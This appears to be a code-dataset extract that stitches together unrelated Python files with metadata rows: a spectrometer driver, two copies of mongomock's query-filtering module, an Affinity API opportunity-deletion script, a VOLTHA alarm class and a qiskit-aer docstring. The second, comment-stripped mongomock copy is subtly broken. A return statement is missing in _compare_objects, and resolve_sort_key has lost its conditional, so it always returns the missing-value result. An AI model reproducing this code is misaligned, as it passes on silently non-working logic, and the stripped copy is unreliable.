| 25.196721 | 78 | 0.668835 | from seatease.spectrometers import Spectrometer, list_devices
from time import sleep
features = {
"measure": True,
"correct_nl": False,
"correct_dc": False,
"temperature": False,
"int_time_limits": True,
"sat_intensity": True,
}
class Device(object):
def __init__(self, device_obj=None, **kwargs):
if device_obj is None:
self._device = Spectrometer(list_devices()[0])
else:
self._device = Spectrometer(device_obj)
def measure(self, **kwargs):
correct_nl = kwargs["correct_nl"] if "correct_nl" in kwargs else False
correct_dc = kwargs["correct_dc"] if "correct_dc" in kwargs else False
return self._device.intensities(correct_dc, correct_nl)
def wavelengths(self, **kwargs):
return self._device.wavelengths()
def set_int_time(self, int_time, sleep_time=0, **kwargs):
self._device.integration_time_micros(int_time)
sleep(sleep_time)
@property
def int_time_limits(self):
return self._device.integration_time_micros_limits
@property
def sat_intensity(self):
return self._device.max_intensity
# }}}
def devices():
return list_devices()
def first_available_device():
return Device()
def get_name(self):
return "seatease"
| true | true |
1c305148d374f55b3f65306302b42c446774fab6 | 15,548 | py | Python | mongomock/filtering.py | maximeLeurent/mongo_mock | 76900d82f80ee66662460a0029058f39b096bf88 | [
"BSD-3-Clause"
] | null | null | null | mongomock/filtering.py | maximeLeurent/mongo_mock | 76900d82f80ee66662460a0029058f39b096bf88 | [
"BSD-3-Clause"
] | null | null | null | mongomock/filtering.py | maximeLeurent/mongo_mock | 76900d82f80ee66662460a0029058f39b096bf88 | [
"BSD-3-Clause"
] | null | null | null | from datetime import datetime
import itertools
from .helpers import ObjectId, RE_TYPE
from . import OperationFailure
import numbers
import operator
import re
from sentinels import NOTHING
from six import iteritems, iterkeys, string_types
try:
from types import NoneType
except ImportError:
NoneType = type(None)
COMPILED_RE_TYPE = type(re.compile('a'))
_TOP_LEVEL_OPERATORS = {'$expr', '$text', '$where', '$jsonSchema'}
def filter_applies(search_filter, document):
"""Applies given filter
This function implements MongoDB's matching strategy over documents in the find() method
and other related scenarios (like $elemMatch)
"""
return _Filterer().apply(search_filter, document)
class _Filterer(object):
"""An object to help applying a filter, using the MongoDB query language."""
def __init__(self):
self._operator_map = dict({
'$eq': _list_expand(operator_eq),
'$ne': _list_expand(lambda dv, sv: not operator_eq(dv, sv), negative=True),
'$all': self._all_op,
'$in': _in_op,
'$nin': lambda dv, sv: not _in_op(dv, sv),
'$exists': lambda dv, sv: bool(sv) == (dv is not NOTHING),
'$regex': _not_nothing_and(lambda dv, sv: _regex(dv, re.compile(sv))),
'$elemMatch': self._elem_match_op,
'$size': _size_op,
'$type': _type_op
}, **{
key: _not_nothing_and(_list_expand(_compare_objects(op)))
for key, op in iteritems(SORTING_OPERATOR_MAP)
})
def apply(self, search_filter, document):
if not isinstance(search_filter, dict):
raise OperationFailure('the match filter must be an expression in an object')
for key, search in iteritems(search_filter):
# Top level operators.
if key == '$comment':
continue
if key in LOGICAL_OPERATOR_MAP:
if not search:
raise OperationFailure('BadValue $and/$or/$nor must be a nonempty array')
if not LOGICAL_OPERATOR_MAP[key](document, search, self.apply):
return False
continue
if key in _TOP_LEVEL_OPERATORS:
raise NotImplementedError(
'The {} operator is not implemented in mongomock yet'.format(key))
if key.startswith('$'):
raise OperationFailure('unknown top level operator: ' + key)
is_match = False
is_checking_negative_match = \
isinstance(search, dict) and {'$ne', '$nin'} & set(search.keys())
is_checking_positive_match = \
not isinstance(search, dict) or (set(search.keys()) - {'$ne', '$nin'})
has_candidates = False
if search == {'$exists': False} and not iter_key_candidates(key, document):
continue
if isinstance(search, dict) and '$all' in search:
if not self._all_op(iter_key_candidates(key, document), search['$all']):
return False
continue
for doc_val in iter_key_candidates(key, document):
has_candidates |= doc_val is not NOTHING
is_ops_filter = search and isinstance(search, dict) and \
all(key.startswith('$') for key in search.keys())
if is_ops_filter:
if '$options' in search and '$regex' in search:
search = _combine_regex_options(search)
unknown_operators = set(search) - set(self._operator_map) - {'$not'}
if unknown_operators:
raise OperationFailure('unknown operator: ' + list(unknown_operators)[0])
is_match = all(
operator_string in self._operator_map and
self._operator_map[operator_string](doc_val, search_val) or
operator_string == '$not' and
self._not_op(document, key, search_val)
for operator_string, search_val in iteritems(search)
) and search
elif isinstance(search, RE_TYPE) and isinstance(doc_val, (string_types, list)):
is_match = _regex(doc_val, search)
elif key in LOGICAL_OPERATOR_MAP:
if not search:
raise OperationFailure('BadValue $and/$or/$nor must be a nonempty array')
is_match = LOGICAL_OPERATOR_MAP[key](document, search, self.apply)
elif isinstance(doc_val, (list, tuple)):
is_match = (search in doc_val or search == doc_val)
if isinstance(search, ObjectId):
is_match |= (str(search) in doc_val)
else:
is_match = (doc_val == search) or (search is None and doc_val is NOTHING)
# When checking negative match, all the elements should match.
if is_checking_negative_match and not is_match:
return False
# If not checking negative matches, the first match is enouh for this criteria.
if is_match and not is_checking_negative_match:
break
if not is_match and (has_candidates or is_checking_positive_match):
return False
return True
def _not_op(self, d, k, s):
if isinstance(s, dict):
for key in s.keys():
if key not in self._operator_map and key not in LOGICAL_OPERATOR_MAP:
raise OperationFailure('unknown operator: %s' % key)
elif isinstance(s, type(re.compile(''))):
pass
else:
raise OperationFailure('$not needs a regex or a document')
return not self.apply({k: s}, d)
def _elem_match_op(self, doc_val, query):
if not isinstance(doc_val, list):
return False
if not isinstance(query, dict):
raise OperationFailure('$elemMatch needs an Object')
return any(self.apply(query, item) for item in doc_val)
def _all_op(self, doc_val, search_val):
if isinstance(doc_val, list) and doc_val and isinstance(doc_val[0], list):
doc_val = list(itertools.chain.from_iterable(doc_val))
dv = _force_list(doc_val)
matches = []
for x in search_val:
if isinstance(x, dict) and '$elemMatch' in x:
matches.append(self._elem_match_op(doc_val, x['$elemMatch']))
else:
matches.append(x in dv)
return all(matches)
def iter_key_candidates(key, doc):
"""Get possible subdocuments or lists that are referred to by the key in question
Returns the appropriate nested value if the key includes dot notation.
"""
if doc is None:
return ()
if not key:
return [doc]
if isinstance(doc, list):
return _iter_key_candidates_sublist(key, doc)
if not isinstance(doc, dict):
return ()
key_parts = key.split('.')
if len(key_parts) == 1:
return [doc.get(key, NOTHING)]
sub_key = '.'.join(key_parts[1:])
sub_doc = doc.get(key_parts[0], {})
return iter_key_candidates(sub_key, sub_doc)
def _iter_key_candidates_sublist(key, doc):
"""Iterates of candidates
:param doc: a list to be searched for candidates for our key
:param key: the string key to be matched
"""
key_parts = key.split('.')
sub_key = key_parts.pop(0)
key_remainder = '.'.join(key_parts)
try:
sub_key_int = int(sub_key)
except ValueError:
sub_key_int = None
if sub_key_int is None:
# subkey is not an integer...
return [x
for sub_doc in doc
if isinstance(sub_doc, dict) and sub_key in sub_doc
for x in iter_key_candidates(key_remainder, sub_doc[sub_key])]
# subkey is an index
if sub_key_int >= len(doc):
return () # dead end
sub_doc = doc[sub_key_int]
if key_parts:
return iter_key_candidates('.'.join(key_parts), sub_doc)
return [sub_doc]
def _force_list(v):
return v if isinstance(v, (list, tuple)) else [v]
def _in_op(doc_val, search_val):
if not isinstance(search_val, (list, tuple)):
raise OperationFailure('$in needs an array')
if doc_val is NOTHING and None in search_val:
return True
doc_val = _force_list(doc_val)
is_regex_list = [isinstance(x, COMPILED_RE_TYPE) for x in search_val]
if not any(is_regex_list):
return any(x in search_val for x in doc_val)
for x, is_regex in zip(search_val, is_regex_list):
if (is_regex and _regex(doc_val, x)) or (x in doc_val):
return True
return False
def _not_nothing_and(f):
"""wrap an operator to return False if the first arg is NOTHING"""
return lambda v, l: v is not NOTHING and f(v, l)
def _compare_objects(op):
"""Wrap an operator to also compare objects following BSON comparison.
See https://docs.mongodb.com/manual/reference/bson-type-comparison-order/#objects
"""
def _wrapped(a, b):
# Do not compare uncomparable types, see Type Bracketing:
# https://docs.mongodb.com/manual/reference/method/db.collection.find/#type-bracketing
return bson_compare(op, a, b, can_compare_types=False)
return _wrapped
def bson_compare(op, a, b, can_compare_types=True):
"""Compare two elements using BSON comparison.
Args:
op: the basic operation to compare (e.g. operator.lt, operator.ge).
a: the first operand
b: the second operand
can_compare_types: if True, according to BSON's definition order
between types is used, otherwise always return False when types are
different.
"""
a_type = _get_compare_type(a)
b_type = _get_compare_type(b)
if a_type != b_type:
return can_compare_types and op(a_type, b_type)
if isinstance(a, dict):
# MongoDb server compares the type before comparing the keys
# https://github.com/mongodb/mongo/blob/f10f214/src/mongo/bson/bsonelement.cpp#L516
# even though the documentation does not say anything about that.
a = [(_get_compare_type(v), k, v) for k, v in iteritems(a)]
b = [(_get_compare_type(v), k, v) for k, v in iteritems(b)]
if isinstance(a, (tuple, list)):
for item_a, item_b in zip(a, b):
if item_a != item_b:
return bson_compare(op, item_a, item_b)
return bson_compare(op, len(a), len(b))
if isinstance(a, NoneType):
return op(0, 0)
return op(a, b)
def _get_compare_type(val):
"""Get a number representing the base type of the value used for comparison.
See https://docs.mongodb.com/manual/reference/bson-type-comparison-order/
also https://github.com/mongodb/mongo/blob/46b28bb/src/mongo/bson/bsontypes.h#L175
for canonical values.
"""
if isinstance(val, NoneType):
return 5
if isinstance(val, bool):
return 40
if isinstance(val, numbers.Number):
return 10
if isinstance(val, string_types):
return 15
if isinstance(val, dict):
return 20
if isinstance(val, (tuple, list)):
return 25
if isinstance(val, ObjectId):
return 35
if isinstance(val, datetime):
return 45
if isinstance(val, RE_TYPE):
return 50
raise NotImplementedError(
"Mongomock does not know how to sort '%s' of type '%s'" %
(val, type(val)))
def _regex(doc_val, regex):
if not (isinstance(doc_val, (string_types, list)) or isinstance(doc_val, RE_TYPE)):
return False
return any(
regex.search(item) for item in _force_list(doc_val)
if isinstance(item, string_types))
def _size_op(doc_val, search_val):
if isinstance(doc_val, (list, tuple, dict)):
return search_val == len(doc_val)
return search_val == 1 if doc_val else 0
def _list_expand(f, negative=False):
def func(doc_val, search_val):
if isinstance(doc_val, (list, tuple)):
if negative:
return all(f(val, search_val) for val in doc_val)
return any(f(val, search_val) for val in doc_val)
return f(doc_val, search_val)
return func
def _type_op(doc_val, search_val):
if search_val not in TYPE_MAP:
raise OperationFailure('%r is not a valid $type' % search_val)
elif TYPE_MAP[search_val] is None:
raise NotImplementedError('%s is a valid $type but not implemented' % search_val)
return isinstance(doc_val, TYPE_MAP[search_val])
def _combine_regex_options(search):
if not isinstance(search['$options'], string_types):
raise OperationFailure('$options has to be a string')
options = None
for option in search['$options']:
if option not in 'imxs':
continue
re_option = getattr(re, option.upper())
if options is None:
options = re_option
else:
options |= re_option
search_copy = dict(search)
del search_copy['$options']
if options is None:
return search_copy
if isinstance(search['$regex'], COMPILED_RE_TYPE):
keys = [k for k in iterkeys(search) if k in {'$regex', '$options'}]
if keys == ['$options', '$regex']:
raise NotImplementedError(
'Do not use compiled regular expressions with $options until '
'https://jira.mongodb.org/browse/SERVER-38621 is solved.')
search_copy['$regex'] = re.compile(
search['$regex'].pattern, search['$regex'].flags | options)
else:
search_copy['$regex'] = re.compile(search['$regex'], options)
return search_copy
def operator_eq(doc_val, search_val):
if doc_val is NOTHING and search_val is None:
return True
return operator.eq(doc_val, search_val)
SORTING_OPERATOR_MAP = {
'$gt': operator.gt,
'$gte': operator.ge,
'$lt': operator.lt,
'$lte': operator.le,
}
LOGICAL_OPERATOR_MAP = {
'$or': lambda d, subq, filter_func: any(filter_func(q, d) for q in subq),
'$and': lambda d, subq, filter_func: all(filter_func(q, d) for q in subq),
'$nor': lambda d, subq, filter_func: all(not filter_func(q, d) for q in subq),
}
TYPE_MAP = {
'double': (float,),
'string': (str,),
'object': (dict,),
'array': (list,),
'binData': (bytes,),
'undefined': None,
'objectId': (ObjectId,),
'bool': (bool,),
'date': (datetime,),
'null': None,
'regex': None,
'dbPointer': None,
'javascript': None,
'symbol': None,
'javascriptWithScope': None,
'int': (int,),
'timestamp': None,
'long': (float,),
'decimal': (float,),
'minKey': None,
'maxKey': None,
}
def resolve_key(key, doc):
return next(iter(iter_key_candidates(key, doc)), NOTHING)
def resolve_sort_key(key, doc):
value = resolve_key(key, doc)
# see http://docs.mongodb.org/manual/reference/method/cursor.sort/#ascending-descending-sort
if value is NOTHING:
return 0, BsonComparable(None)
return 1, BsonComparable(value)
class BsonComparable(object):
"""Wraps a value in an BSON like object that can be compared one to another."""
def __init__(self, obj):
self.obj = obj
def __lt__(self, other):
return bson_compare(operator.lt, self.obj, other.obj)
| 34.551111 | 97 | 0.61159 | from datetime import datetime
import itertools
from .helpers import ObjectId, RE_TYPE
from . import OperationFailure
import numbers
import operator
import re
from sentinels import NOTHING
from six import iteritems, iterkeys, string_types
try:
from types import NoneType
except ImportError:
NoneType = type(None)
COMPILED_RE_TYPE = type(re.compile('a'))
_TOP_LEVEL_OPERATORS = {'$expr', '$text', '$where', '$jsonSchema'}
def filter_applies(search_filter, document):
return _Filterer().apply(search_filter, document)
class _Filterer(object):
def __init__(self):
self._operator_map = dict({
'$eq': _list_expand(operator_eq),
'$ne': _list_expand(lambda dv, sv: not operator_eq(dv, sv), negative=True),
'$all': self._all_op,
'$in': _in_op,
'$nin': lambda dv, sv: not _in_op(dv, sv),
'$exists': lambda dv, sv: bool(sv) == (dv is not NOTHING),
'$regex': _not_nothing_and(lambda dv, sv: _regex(dv, re.compile(sv))),
'$elemMatch': self._elem_match_op,
'$size': _size_op,
'$type': _type_op
}, **{
key: _not_nothing_and(_list_expand(_compare_objects(op)))
for key, op in iteritems(SORTING_OPERATOR_MAP)
})
def apply(self, search_filter, document):
if not isinstance(search_filter, dict):
raise OperationFailure('the match filter must be an expression in an object')
for key, search in iteritems(search_filter):
if key == '$comment':
continue
if key in LOGICAL_OPERATOR_MAP:
if not search:
raise OperationFailure('BadValue $and/$or/$nor must be a nonempty array')
if not LOGICAL_OPERATOR_MAP[key](document, search, self.apply):
return False
continue
if key in _TOP_LEVEL_OPERATORS:
raise NotImplementedError(
'The {} operator is not implemented in mongomock yet'.format(key))
if key.startswith('$'):
raise OperationFailure('unknown top level operator: ' + key)
is_match = False
is_checking_negative_match = \
isinstance(search, dict) and {'$ne', '$nin'} & set(search.keys())
is_checking_positive_match = \
not isinstance(search, dict) or (set(search.keys()) - {'$ne', '$nin'})
has_candidates = False
if search == {'$exists': False} and not iter_key_candidates(key, document):
continue
if isinstance(search, dict) and '$all' in search:
if not self._all_op(iter_key_candidates(key, document), search['$all']):
return False
continue
for doc_val in iter_key_candidates(key, document):
has_candidates |= doc_val is not NOTHING
is_ops_filter = search and isinstance(search, dict) and \
all(key.startswith('$') for key in search.keys())
if is_ops_filter:
if '$options' in search and '$regex' in search:
search = _combine_regex_options(search)
unknown_operators = set(search) - set(self._operator_map) - {'$not'}
if unknown_operators:
raise OperationFailure('unknown operator: ' + list(unknown_operators)[0])
is_match = all(
operator_string in self._operator_map and
self._operator_map[operator_string](doc_val, search_val) or
operator_string == '$not' and
self._not_op(document, key, search_val)
for operator_string, search_val in iteritems(search)
) and search
elif isinstance(search, RE_TYPE) and isinstance(doc_val, (string_types, list)):
is_match = _regex(doc_val, search)
elif key in LOGICAL_OPERATOR_MAP:
if not search:
raise OperationFailure('BadValue $and/$or/$nor must be a nonempty array')
is_match = LOGICAL_OPERATOR_MAP[key](document, search, self.apply)
elif isinstance(doc_val, (list, tuple)):
is_match = (search in doc_val or search == doc_val)
if isinstance(search, ObjectId):
is_match |= (str(search) in doc_val)
else:
is_match = (doc_val == search) or (search is None and doc_val is NOTHING)
if is_checking_negative_match and not is_match:
return False
if is_match and not is_checking_negative_match:
break
if not is_match and (has_candidates or is_checking_positive_match):
return False
return True
def _not_op(self, d, k, s):
if isinstance(s, dict):
for key in s.keys():
if key not in self._operator_map and key not in LOGICAL_OPERATOR_MAP:
raise OperationFailure('unknown operator: %s' % key)
elif isinstance(s, type(re.compile(''))):
pass
else:
raise OperationFailure('$not needs a regex or a document')
return not self.apply({k: s}, d)
def _elem_match_op(self, doc_val, query):
if not isinstance(doc_val, list):
return False
if not isinstance(query, dict):
raise OperationFailure('$elemMatch needs an Object')
return any(self.apply(query, item) for item in doc_val)
def _all_op(self, doc_val, search_val):
if isinstance(doc_val, list) and doc_val and isinstance(doc_val[0], list):
doc_val = list(itertools.chain.from_iterable(doc_val))
dv = _force_list(doc_val)
matches = []
for x in search_val:
if isinstance(x, dict) and '$elemMatch' in x:
matches.append(self._elem_match_op(doc_val, x['$elemMatch']))
else:
matches.append(x in dv)
return all(matches)
def iter_key_candidates(key, doc):
if doc is None:
return ()
if not key:
return [doc]
if isinstance(doc, list):
return _iter_key_candidates_sublist(key, doc)
if not isinstance(doc, dict):
return ()
key_parts = key.split('.')
if len(key_parts) == 1:
return [doc.get(key, NOTHING)]
sub_key = '.'.join(key_parts[1:])
sub_doc = doc.get(key_parts[0], {})
return iter_key_candidates(sub_key, sub_doc)
def _iter_key_candidates_sublist(key, doc):
key_parts = key.split('.')
sub_key = key_parts.pop(0)
key_remainder = '.'.join(key_parts)
try:
sub_key_int = int(sub_key)
except ValueError:
sub_key_int = None
if sub_key_int is None:
return [x
for sub_doc in doc
if isinstance(sub_doc, dict) and sub_key in sub_doc
for x in iter_key_candidates(key_remainder, sub_doc[sub_key])]
if sub_key_int >= len(doc):
return ()
sub_doc = doc[sub_key_int]
if key_parts:
return iter_key_candidates('.'.join(key_parts), sub_doc)
return [sub_doc]
def _force_list(v):
return v if isinstance(v, (list, tuple)) else [v]
def _in_op(doc_val, search_val):
if not isinstance(search_val, (list, tuple)):
raise OperationFailure('$in needs an array')
if doc_val is NOTHING and None in search_val:
return True
doc_val = _force_list(doc_val)
is_regex_list = [isinstance(x, COMPILED_RE_TYPE) for x in search_val]
if not any(is_regex_list):
return any(x in search_val for x in doc_val)
for x, is_regex in zip(search_val, is_regex_list):
if (is_regex and _regex(doc_val, x)) or (x in doc_val):
return True
return False
def _not_nothing_and(f):
return lambda v, l: v is not NOTHING and f(v, l)
def _compare_objects(op):
def _wrapped(a, b):
bson_compare(op, a, b, can_compare_types=False)
return _wrapped
def bson_compare(op, a, b, can_compare_types=True):
a_type = _get_compare_type(a)
b_type = _get_compare_type(b)
if a_type != b_type:
return can_compare_types and op(a_type, b_type)
if isinstance(a, dict):
a = [(_get_compare_type(v), k, v) for k, v in iteritems(a)]
b = [(_get_compare_type(v), k, v) for k, v in iteritems(b)]
if isinstance(a, (tuple, list)):
for item_a, item_b in zip(a, b):
if item_a != item_b:
return bson_compare(op, item_a, item_b)
return bson_compare(op, len(a), len(b))
if isinstance(a, NoneType):
return op(0, 0)
return op(a, b)
def _get_compare_type(val):
if isinstance(val, NoneType):
return 5
if isinstance(val, bool):
return 40
if isinstance(val, numbers.Number):
return 10
if isinstance(val, string_types):
return 15
if isinstance(val, dict):
return 20
if isinstance(val, (tuple, list)):
return 25
if isinstance(val, ObjectId):
return 35
if isinstance(val, datetime):
return 45
if isinstance(val, RE_TYPE):
return 50
raise NotImplementedError(
"Mongomock does not know how to sort '%s' of type '%s'" %
(val, type(val)))
def _regex(doc_val, regex):
if not (isinstance(doc_val, (string_types, list)) or isinstance(doc_val, RE_TYPE)):
return False
return any(
regex.search(item) for item in _force_list(doc_val)
if isinstance(item, string_types))
def _size_op(doc_val, search_val):
if isinstance(doc_val, (list, tuple, dict)):
return search_val == len(doc_val)
return search_val == 1 if doc_val else 0
def _list_expand(f, negative=False):
def func(doc_val, search_val):
if isinstance(doc_val, (list, tuple)):
if negative:
return all(f(val, search_val) for val in doc_val)
return any(f(val, search_val) for val in doc_val)
return f(doc_val, search_val)
return func
def _type_op(doc_val, search_val):
if search_val not in TYPE_MAP:
raise OperationFailure('%r is not a valid $type' % search_val)
elif TYPE_MAP[search_val] is None:
raise NotImplementedError('%s is a valid $type but not implemented' % search_val)
return isinstance(doc_val, TYPE_MAP[search_val])
def _combine_regex_options(search):
if not isinstance(search['$options'], string_types):
raise OperationFailure('$options has to be a string')
options = None
for option in search['$options']:
if option not in 'imxs':
continue
re_option = getattr(re, option.upper())
if options is None:
options = re_option
else:
options |= re_option
search_copy = dict(search)
del search_copy['$options']
if options is None:
return search_copy
if isinstance(search['$regex'], COMPILED_RE_TYPE):
keys = [k for k in iterkeys(search) if k in {'$regex', '$options'}]
if keys == ['$options', '$regex']:
raise NotImplementedError(
'Do not use compiled regular expressions with $options until '
'https://jira.mongodb.org/browse/SERVER-38621 is solved.')
search_copy['$regex'] = re.compile(
search['$regex'].pattern, search['$regex'].flags | options)
else:
search_copy['$regex'] = re.compile(search['$regex'], options)
return search_copy
def operator_eq(doc_val, search_val):
if doc_val is NOTHING and search_val is None:
return True
return operator.eq(doc_val, search_val)
SORTING_OPERATOR_MAP = {
'$gt': operator.gt,
'$gte': operator.ge,
'$lt': operator.lt,
'$lte': operator.le,
}
LOGICAL_OPERATOR_MAP = {
'$or': lambda d, subq, filter_func: any(filter_func(q, d) for q in subq),
'$and': lambda d, subq, filter_func: all(filter_func(q, d) for q in subq),
'$nor': lambda d, subq, filter_func: all(not filter_func(q, d) for q in subq),
}
TYPE_MAP = {
'double': (float,),
'string': (str,),
'object': (dict,),
'array': (list,),
'binData': (bytes,),
'undefined': None,
'objectId': (ObjectId,),
'bool': (bool,),
'date': (datetime,),
'null': None,
'regex': None,
'dbPointer': None,
'javascript': None,
'symbol': None,
'javascriptWithScope': None,
'int': (int,),
'timestamp': None,
'long': (float,),
'decimal': (float,),
'minKey': None,
'maxKey': None,
}
def resolve_key(key, doc):
return next(iter(iter_key_candidates(key, doc)), NOTHING)
def resolve_sort_key(key, doc):
value = resolve_key(key, doc)
return 0, BsonComparable(None)
return 1, BsonComparable(value)
class BsonComparable(object):
def __init__(self, obj):
self.obj = obj
def __lt__(self, other):
return bson_compare(operator.lt, self.obj, other.obj)
| true | true |
1c305156fe152697d24331502b2aca807f21ccf5 | 2,392 | py | Python | script.py | Aaron1515/affinity-delete-opps | e5aa4daf1d863bd7c872c31277c22872084c41f9 | [
"MIT"
] | null | null | null | script.py | Aaron1515/affinity-delete-opps | e5aa4daf1d863bd7c872c31277c22872084c41f9 | [
"MIT"
] | null | null | null | script.py | Aaron1515/affinity-delete-opps | e5aa4daf1d863bd7c872c31277c22872084c41f9 | [
"MIT"
] | null | null | null | import requests
import csv
from apikeys import *
from opp_ids import *
total_count = len(opp_ids)
current_count = 0
corrected_count = 0
log_file = open("log.csv", "w")
log_file.write("Oppertunity ID, Status code, Note")
log_file.write("\n")
for each in opp_ids:
response = requests.delete("https://api.affinity.co/opportunities/" + str(each), auth=('', api_key))
current_count = current_count + 1
if response.status_code == 200:
corrected_count = corrected_count + 1
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - "+ str(response.json()))
log_file.write(str(each) + ", " + str(response.status_code) + ", " + str(response.json()))
log_file.write("\n")
elif response.status_code == 422:
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - "+ str(response.json()))
log_file.write(str(each) + ", " + str(response.status_code) + ", " + str(response.json()))
log_file.write("\n")
elif response.status_code == 429:
print("Working on " + str(each) + " - 429 error - "+ str(response.json()))
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - API Limit Reached")
log_file.write(str(each) + ", " + str(response.status_code) + ", " + "API Limit Reached")
log_file.write("\n")
break
elif response.status_code == 500:
print("Working on " + str(each) + " - 500 error - Internal Server Error")
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - Internal Server Error")
log_file.write(str(each) + ", " + str(response.status_code) + ", " + "Internal Server Error")
log_file.write("\n")
elif response.status_code == 503:
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - Internal Server Error")
log_file.write(str(each) + ", " + str(response.status_code) + ", " + "Internal Server Error")
log_file.write("\n")
else:
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - "+ str(response.json()))
log_file.write(str(each) + ", " + str(response.status_code) + ", " + response.json()[0])
log_file.write("\n")
log_file.write("\n")
log_file.write("Number of successful oppertunities removed: " + str(corrected_count)+"\n")
log_file.write("Number of entries proccessed: " + str(current_count))
log_file.close() | 46 | 112 | 0.644649 | import requests
import csv
from apikeys import *
from opp_ids import *
total_count = len(opp_ids)
current_count = 0
corrected_count = 0
log_file = open("log.csv", "w")
log_file.write("Oppertunity ID, Status code, Note")
log_file.write("\n")
for each in opp_ids:
response = requests.delete("https://api.affinity.co/opportunities/" + str(each), auth=('', api_key))
current_count = current_count + 1
if response.status_code == 200:
corrected_count = corrected_count + 1
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - "+ str(response.json()))
log_file.write(str(each) + ", " + str(response.status_code) + ", " + str(response.json()))
log_file.write("\n")
elif response.status_code == 422:
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - "+ str(response.json()))
log_file.write(str(each) + ", " + str(response.status_code) + ", " + str(response.json()))
log_file.write("\n")
elif response.status_code == 429:
print("Working on " + str(each) + " - 429 error - "+ str(response.json()))
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - API Limit Reached")
log_file.write(str(each) + ", " + str(response.status_code) + ", " + "API Limit Reached")
log_file.write("\n")
break
elif response.status_code == 500:
print("Working on " + str(each) + " - 500 error - Internal Server Error")
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - Internal Server Error")
log_file.write(str(each) + ", " + str(response.status_code) + ", " + "Internal Server Error")
log_file.write("\n")
elif response.status_code == 503:
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - Internal Server Error")
log_file.write(str(each) + ", " + str(response.status_code) + ", " + "Internal Server Error")
log_file.write("\n")
else:
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - "+ str(response.json()))
log_file.write(str(each) + ", " + str(response.status_code) + ", " + response.json()[0])
log_file.write("\n")
log_file.write("\n")
log_file.write("Number of successful oppertunities removed: " + str(corrected_count)+"\n")
log_file.write("Number of entries proccessed: " + str(current_count))
log_file.close() | true | true |
1c30538966065c1eab9a2b56db803daff4678a4c | 1,423 | py | Python | voltha/extensions/alarms/onu/onu_activation_fail_alarm.py | jeffvan-netsia/voltha_doc | 8af3c0e9348142ca07e849db8ce494ce66ea15f6 | [
"Apache-2.0"
] | null | null | null | voltha/extensions/alarms/onu/onu_activation_fail_alarm.py | jeffvan-netsia/voltha_doc | 8af3c0e9348142ca07e849db8ce494ce66ea15f6 | [
"Apache-2.0"
] | 3 | 2021-03-31T18:55:31.000Z | 2022-02-11T03:40:15.000Z | voltha/extensions/alarms/onu/onu_activation_fail_alarm.py | netsia/voltha_doc | 8af3c0e9348142ca07e849db8ce494ce66ea15f6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017-present Adtran, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from voltha.protos.events_pb2 import AlarmEventType, AlarmEventSeverity, AlarmEventCategory
from voltha.extensions.alarms.adapter_alarms import AlarmBase
class OnuActivationFailAlarm(AlarmBase):
def __init__(self, alarm_mgr, onu_id, intf_id):
super(OnuActivationFailAlarm, self).__init__(alarm_mgr, object_type='onu ACTIVATION FAIL',
alarm='ACTIVATION_FAIL',
alarm_category=AlarmEventCategory.ONU,
alarm_type=AlarmEventType.COMMUNICATION,
alarm_severity=AlarmEventSeverity.MAJOR)
self._onu_id = onu_id
self._intf_id = intf_id
def get_context_data(self):
return {'onu-id': self._onu_id,
'onu-intf-id': self._intf_id}
| 45.903226 | 98 | 0.676037 |
from voltha.protos.events_pb2 import AlarmEventType, AlarmEventSeverity, AlarmEventCategory
from voltha.extensions.alarms.adapter_alarms import AlarmBase
class OnuActivationFailAlarm(AlarmBase):
def __init__(self, alarm_mgr, onu_id, intf_id):
super(OnuActivationFailAlarm, self).__init__(alarm_mgr, object_type='onu ACTIVATION FAIL',
alarm='ACTIVATION_FAIL',
alarm_category=AlarmEventCategory.ONU,
alarm_type=AlarmEventType.COMMUNICATION,
alarm_severity=AlarmEventSeverity.MAJOR)
self._onu_id = onu_id
self._intf_id = intf_id
def get_context_data(self):
return {'onu-id': self._onu_id,
'onu-intf-id': self._intf_id}
| true | true |
1c305399f11dcd40a1d2fdbabac57dd9b11aff29 | 5,483 | py | Python | qiskit/providers/aer/library/__init__.py | jakelishman/qiskit-aer | 7512ecede820e0d2bc7ad7b6704bcf06a861ca3a | [
"Apache-2.0"
] | 1 | 2020-07-14T15:32:04.000Z | 2020-07-14T15:32:04.000Z | qiskit/providers/aer/library/__init__.py | jakelishman/qiskit-aer | 7512ecede820e0d2bc7ad7b6704bcf06a861ca3a | [
"Apache-2.0"
] | null | null | null | qiskit/providers/aer/library/__init__.py | jakelishman/qiskit-aer | 7512ecede820e0d2bc7ad7b6704bcf06a861ca3a | [
"Apache-2.0"
] | null | null | null | # This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
=========================================================
Instruction Library (:mod:`qiskit.providers.aer.library`)
=========================================================
.. currentmodule:: qiskit.providers.aer.library
This library contains custom qiskit :class:`~qiskit.QuantumCircuit`
:class:`~qiskit.circuit.Instruction` subclasses that can be used
with the Aer circuit simulator backends.
Setting a Custom Simulator State
================================
The following instruction classes can be used to set the specific
simulator methods to a custom state. Note that these instructions
are only valid when applied to all qubits in a circuit. Applying
to a subset of qubits will raise an exception during execution.
Instruction Classes
-------------------
.. autosummary::
:toctree: ../stubs/
SetStatevector
SetDensityMatrix
